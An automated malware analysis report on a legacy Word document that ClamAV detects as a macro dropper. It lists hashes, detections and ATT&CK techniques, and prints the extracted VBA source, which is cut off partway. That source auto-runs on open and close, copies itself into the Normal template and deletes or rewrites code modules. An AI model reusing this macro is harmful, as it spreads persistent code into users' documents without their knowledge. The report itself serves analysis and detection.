Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 03cea7344b9b5364…

MALICIOUS

Office (OLE)

Size: 34.0 KB
Created: 1997-01-29 21:32:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 00d48f4d77a1e1275e6652beee899c38
SHA-1: b17ed08579cf353da4ebf6fd9fcc98690f1b475d
SHA-256: 03cea7344b9b5364420bfcc1f0a40e2ee76979a76b2cf72ef54e14a98199cace
Risk score: 180

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1547.001 Registry Run Keys / Startup Folder

The sample is a legacy Word document containing VBA macros. The presence of AutoOpen, AutoExec, AutoClose, and AutoNew macros, along with a function named 'E' that copies the 'CleanAll' macro project between the active document and the normal template, strongly suggests an attempt to establish persistence or spread the macro. The ClamAV detection 'Doc.Dropper.Agent-6413073-0' further supports a malicious dropper functionality.

Heuristics (5)

  • ClamAV: Doc.Dropper.Agent-6413073-0 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6413073-0
  • VBA macros detected (severity: medium; 2 related findings; rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro (severity: high; rule: OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Auto_Close macro (severity: high; rule: OLE_VBA_AUTOCLOSE)
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker (severity: medium; rule: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5081 bytes
SHA-256: 59a4aeb2458503883fb355981bd88a548c4061e2fdf2fe02e565c9d87f54a568

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'#########################################################################
'###    The Template of This Document Is Protected by an Active Macro. ###
'###    Clean'All - Analyzed by 'Mario Hecules', on 05/04/2000         ###
'###    Tecnomecânica Esmaltec Ltda - Fortaleza-Ce                     ###
'#########################################################################

Attribute VB_Name = "CleanAll"
Sub AutoExec()
    On Error Resume Next
    Application.EnableCancelKey = wdCancelDisabled
    Options.VirusProtection = True
    Call E
    Call Delete
    Call CleanAll
End Sub

Sub AutoOpen()
    On Error Resume Next
    Application.EnableCancelKey = wdCancelDisabled
    Call E
    Call Delete
    Call CleanAll
End Sub

Sub AutoNew()
    On Error Resume Next
    Application.EnableCancelKey = wdCancelDisabled
    Call Delete
End Sub

Sub AutoClose()
    On Error Resume Next
    Application.EnableCancelKey = wdCancelDisabled
    Call Delete
    Call CleanAll
End Sub

Function E()
    On Error Resume Next
    Application.EnableCancelKey = wdCancelDisabled
    Dim A, B As String
    A = Application.NormalTemplate.FullName
    B = Application.ActiveDocument.FullName
    Application.OrganizerCopy A, B, "CleanAll", wdOrganizerObjectProjectItems
    Application.OrganizerCopy B, A, "CleanAll", wdOrganizerObjectProjectItems
    Call Delete
End Function

Public Sub AdicionarTeste()
For i = 1 To 200
    ThisDocument.VBProject.VBComponents(1).CodeModule.InsertLines i, "Dim MacrodeTeste_Number_" & i & " as String"
Next i
End Sub

Public Sub Delete()
Dim i As Integer
Dim sDocument As ThisDocument
Dim Scount As String

Scount = ThisDocument.VBProject.VBComponents(1).CodeModule.CountOfLines

'Loop over the whole module
For i = 1 To Scount
    ThisDocument.VBProject.VBComponents(1).CodeModule.DeleteLines 1
Next i


'Add the opening header
With ThisDocument.VBProject.VBComponents(1).CodeModule
    .InsertLines 1, "'#########################################################################"
    .InsertLines 2, "'###    O Modelo Deste Documento Está Protegido por uma Macro Ativa.   ###"
    .InsertLines 3, "'###    Clean'All - Analisado por 'Mario Hecules', em 05/04/2000       ###"
    .InsertLines 4, "'###    Tecnomecânica Esmaltec Ltda - Fortaleza-Ce                     ###"
    .InsertLines 5, "'#########################################################################"
End With

End Sub

Private Sub ImportarCleanAll()
For i = 1 To ThisDocument.VBProject.Collection.Count
    ThisDocument.VBProject.Collection(i).VBComponents.Import "c:\meus documentos\BasCode\CleanAll.bas"
Next i
End Sub

Private Sub ExcluirModulos()
For i = 1 To ThisDocument.VBProject.Collection.Count
    ThisDocument.VBProject.Collection(i).VBComponents.Remove
Next i
End Sub

Private Sub ExportarCleanAll()
For i = 1 To ThisDocument.VBProject.Collection.Count
    If ThisDocument.VBProject.Collection(i).VBComponents(2).Name = "CleanAll" Then
    ThisDocument.VBProject.Collection(1).VBComponents.Item(2).Export "c:\Arquivos de Programas\Microsoft Office\Modelos\CleanAll.bas"
    End If
Next i
End Sub

Public Sub CleanAll() 'Deletes the macro virus.
For i = 1 To Application.VBE.ActiveVBProject.Collection.Count
    'Open documents
     Application.VBE.VBProjects.Item (i)
    
    For j = 1 To Application.VBE.VBProjects.Item(i).VBComponents.Count
    'Check .bas module names and delete
        VBE.ActiveVBProject.VBComponents.Item (j)
    
    'Delete all virus information
        For k = 1 To VBE.ActiveVBProject.VBComponents.Item(j).CodeModule.CountOfLines
            VBE.ActiveVBProject.VBComponents.Item(j).CodeModule.DeleteLines (1)
            If VBE.ActiveVBProject.VBComponents.Item(j).Name = "C
... (truncated)